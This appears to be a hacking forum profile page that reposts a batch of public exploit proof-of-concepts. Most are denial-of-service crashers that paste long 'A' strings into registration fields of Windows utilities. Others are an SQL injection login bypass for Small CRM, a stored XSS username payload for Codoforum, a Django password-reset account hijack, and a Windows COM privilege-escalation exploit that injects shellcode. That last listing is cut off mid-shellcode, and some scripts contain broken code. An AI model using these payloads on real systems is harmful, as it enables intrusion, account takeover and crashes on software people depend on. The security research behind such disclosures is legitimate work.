Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install NetShareWatcher 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.NetShareWatcher Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  2. HireHackking

    Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Backup Key Recovery 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.Backup Key Recovery Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  3. HireHackking

    RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install RemShutdown 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.RemShutdown Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  4. HireHackking

    SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotFTP 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotFTP Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  5. HireHackking

    Office Product Key Finder 1.5.4 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC) # Date: 2020-01-06 # Vendor Homepage: http://www.nsauditor.com/ # Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe # Exploit Author: Gokkul # Tested Version: v1.5.4 # Tested on: Windows 7 x64 # Software Description: # Office Product Key Finder is offline product key finder software and allows to recover and # find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010, # Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers. # 1.- Download and install Office Product Key Finder # 2.- Run python code : Office Product Key Finder.py #!/usr/bin/env python DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") myfile=open('CRASHER.txt','w') myfile.writelines(Dos) myfile.close() print("File created") # 3.- Open CRASHER.txt and copy content to clipboard # 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code' # 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key' # 6.- click 'OK' you will see a crash.
  6. HireHackking

    NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install NBMonitor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.NBMonitor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  7. HireHackking

    RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install RemShutdown 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.RemShutdown Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  8. HireHackking

    SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) # Exploit Author: Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotMSN 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotMSN Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  9. HireHackking

    SpotIM 2.2 - 'Name' Denial Of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotIM 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotIM Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  10. HireHackking

    Small CRM 2.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Small CRM 2.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-01-02 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/small-crm-php/ # Version: V2.0 # Tested on: Windows # CVE : N/A # Description: # # There is a SQL injection vulnerability in the /index.php page # which allows for an attacker to use the SQLi login bypass payload # '=''or' for both the username and password parameters, this allows # for any authenticated or low level user to login to the admin account. ========== 1. Authentication bypass ========== POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Origin: http://10.0.0.214 DNT: 1 Connection: close Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login=
  11. HireHackking

    SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install SpotDialup 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.SpotDialup Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  12. HireHackking

    Duplicate Cleaner Pro 4 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC) # Date: 2020-01-05 # Vendor Homepage:https://www.digitalvolcano.co.uk/index.html # Software Link: https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe # Exploit Author: Achilles # Tested Version: 4.1.3 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Duplicate Cleaner Pro # 4.- Paste the content of EVIL.txt into the Field: 'License key' # 5.- Click 'Activate' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: f.open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  13. HireHackking

    FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) # Google Dork: N/A # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://www.ftpgetter.com/ # Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe # Version: v.5.97.0.223 # Tested on: Windows 7 # CVE : N/A ================================================================== THE BUG : NULL pointer dereference -> DOS crash ================================================================== The FTPGetter Professional v.5.97.0.223 FTP client suffers from a NULL pointer dereference vulnerability via the program not properly handling user input when setting the field "Run program" under profile properties, it triggers when executing the profile. ================================================================== DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183 ================================================================== ... ... ================================================================== WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES ================================================================== (b84.e88): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001 eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe - FTPGetter!Xtermforminitialization$qqrv+0x202d74: 00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=???????? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll - Failed calling InternetOpenUrl, GLE=12007 FAULTING_IP: FTPGetter!Xtermforminitialization$qqrv+202d74 00855994 8b5004 mov edx,dword ptr [eax+4] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 00000004 Attempt to read from address 00000004 FAULTING_THREAD: 00000e88 PROCESS_NAME: FTPGetter.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 00000004 READ_ADDRESS: 00000004 FOLLOWUP_IP: FTPGetter!Xtermforminitialization$qqrv+202d74 00855994 8b5004 mov edx,dword ptr [eax+4] MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE LAST_CONTROL_TRANSFER: from 00812591 to 00855994 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74 0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971 0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1 0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60 0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186 0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23 0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b 0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357 0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf 0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074 0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7 0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6 0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f 0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7 0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe 0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70 0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74 FOLLOWUP_NAME: MachineOwner MODULE_NAME: FTPGetter IMAGE_NAME: FTPGetter.exe DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74 WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1 Followup: MachineOwner --------- NULL pointer FOLLOWUP_IP: REDftp!Xtermforminitialization$qqrv+202d74 00855994 8b5004 mov edx,dword ptr [eax+4] Stepping into and running eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000 eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 REDftp!GetFTPValidationW+0x6e842: 004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=???????? ================================================================== CVE-2020-5183 is a NULL pointer dereference vulnerability ==================================================================
  14. HireHackking

    Codoforum 4.8.3 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting # Google Dork: intext:"Powered by Codoforum" # Date: 2020-01-03 # Exploit Author: Prasanth c41m, Vyshnav Vizz # Vendor Homepage: https://codoforum.com/index.php # Software Link: https://codoforum.com/buy # Version: Codoforum 4.8.3 # Tested on: [relevant os] # CVE : [if applicable] # source: https://medium.com/@c41m/b2e1133c6a91? Codoforum is prone to a stored xss vulnerability. An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks. Codoforum version 4.8.3 is vulnerable. 1. Install Codoforum 4.8.3 in a local server. 2. Goto http://localhost/index.php?u=/user/register 3. Create a user using :- username : "><svg/onload=alert(1)> password : password email : c41m@email.com 4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.
  15. HireHackking

    Django < 3.0 < 2.2 < 1.11 - Account Hijack

    HireHackking posted a blog entry in Hacker Technology
    EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip # django_cve_2019_19844_poc PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/) # Requirements - Python 3.7.x - PostgreSQL 9.5 or higher ## Setup 1. Create database(e.g. `django_cve_2019_19844_poc`) 1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`) 1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput` 1. Create the following user with `shell` command: ```python >>> from django.contrib.auth import get_user_model >>> User = get_user_model() >>> User.objects.create_user('mike123', 'mike@example.org', 'test123') ``` ## Procedure For Reproducing 1. Run `./manage.py runserver` 1. Open `http://127.0.0.1:8000/accounts/password-reset/` 1. Input `mıke@example.org` (Attacker's email), and click send button 1. Receive email (Check console), and reset password 1. Login as `mike123` user
  16. HireHackking

    Microsoft Windows - Shell COM Server Registrar Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    // Axel '0vercl0k' Souchet - December 28 2019 // References: // - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun // - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object // - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp // - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp #include <windows.h> #include <cstdint> #include <atlbase.h> // 54E14197-88B0-442F-B9A3-86837061E2FB // .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h ; Data1 // .rdata:0000000000014108 dw 88B0h ; Data2 // .rdata:0000000000014108 dw 442Fh ; Data3 // .rdata:0000000000014108 db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4 const GUID CLSID_CoreShellComServerRegistrar = { 0x54e14197, 0x88b0, 0x442f, { 0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb }}; // 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7 // .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h ; Data1 // .rdata:00000000000140B8 dw 77F9h ; Data2 // .rdata:00000000000140B8 dw 4AFEh ; Data3 // .rdata:00000000000140B8 db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4 MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7") ICoreShellComServerRegistrar : public IUnknown { // 0:015> dqs 00007ff8`3fe526e8 // [...] // 00007ff8`3fe52730 00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface // 00007ff8`3fe52738 00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef // 00007ff8`3fe52740 00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release // 00007ff8`3fe52748 00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer // 00007ff8`3fe52750 00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer // 00007ff8`3fe52758 00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle // 00007ff8`3fe52760 00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0; virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0; virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0; virtual HRESULT STDMETHODCALLTYPE OpenProcess( const uint32_t DesiredAccess, const bool InheritHandle, const uint32_t ArbitraryPid, const uint32_t TargetProcessId, HANDLE *ProcessHandle ) = 0; }; struct Marshalled_t { uint32_t Meow; uint32_t ObjRefType; GUID IfaceId; uint32_t Flags; uint32_t References; uint64_t Oxid; uint64_t Oid; union { uint64_t IfacePointerIdLow; struct { uint64_t _Dummy1 : 32; uint64_t ServerPid : 16; }; }; uint64_t IfacePointerIdHigh; }; int main() { // // Initialize COM. // HRESULT Hr = CoInitialize(nullptr); if(FAILED(Hr)) { printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back."); return EXIT_FAILURE; } // // Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`. // CComPtr<ICoreShellComServerRegistrar> ComServerRegistrar; Hr = ComServerRegistrar.CoCreateInstance( CLSID_CoreShellComServerRegistrar, nullptr, CLSCTX_LOCAL_SERVER ); if(FAILED(Hr)) { printf("You are probably not vulnerable (%08x) bailing out.", Hr); return EXIT_FAILURE; } // // We don't use the copy ctor here to avoid leaking the object as the returned // stream already has its refcount bumped by `SHCreateMemStream`. // CComPtr<IStream> Stream; Stream.Attach(SHCreateMemStream(nullptr, 0)); // // Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so // that we can extract the PID of the COM server (sihost.exe) in this case. // https://twitter.com/tiraniddo/status/1208073552282488833 // Hr = CoMarshalInterface( Stream, __uuidof(ICoreShellComServerRegistrar), ComServerRegistrar, MSHCTX_LOCAL, nullptr, MSHLFLAGS_NORMAL ); if(FAILED(Hr)) { printf("Failed to marshal the interface (%08x) bailing out.", Hr); return EXIT_FAILURE; } // // Read the PID out of the blob now. // const LARGE_INTEGER Origin {}; Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr); uint8_t Buffer[0x1000] {}; Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr); union { Marshalled_t *Blob; void *Raw; } Ptr; Ptr.Raw = Buffer; const uint32_t SihostPid = Ptr.Blob->ServerPid; // // Ready to get a `PROCESS_ALL_ACCESS` handle to the server now! // HANDLE ProcessHandle; Hr = ComServerRegistrar->OpenProcess( PROCESS_ALL_ACCESS, false, SihostPid, GetCurrentProcessId(), &ProcessHandle ); if(FAILED(Hr)) { printf("Failed to OpenProcess (%08x) bailing out.", Hr); return EXIT_FAILURE; } // // Allocate executable memory in the target. // const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx( ProcessHandle, nullptr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE )); if(ShellcodeAddress == nullptr) { printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError()); return EXIT_FAILURE; } // // This is a CreateProcess(calc) shellcode generated with scc, see payload.cc. // const uint8_t Shellcode[] { 0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 